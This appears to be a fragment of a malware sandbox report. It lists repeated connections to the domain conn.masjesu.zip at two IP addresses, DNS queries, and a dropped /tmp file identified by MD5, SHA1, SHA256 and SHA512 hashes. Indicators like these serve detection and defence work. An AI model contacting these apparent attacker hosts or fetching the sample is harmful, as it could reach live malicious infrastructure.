DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp

Files

/tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97